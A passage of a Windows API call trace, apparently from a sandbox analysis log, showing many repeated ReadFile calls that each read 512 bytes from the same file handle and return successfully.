lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile 
(in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.986] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.986] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.986] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 
[0202.986] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.986] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.986] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.986] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, 
lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, 
lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: 
lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, 
lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, 
lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile 
(in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 
[0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.993] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.994] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, 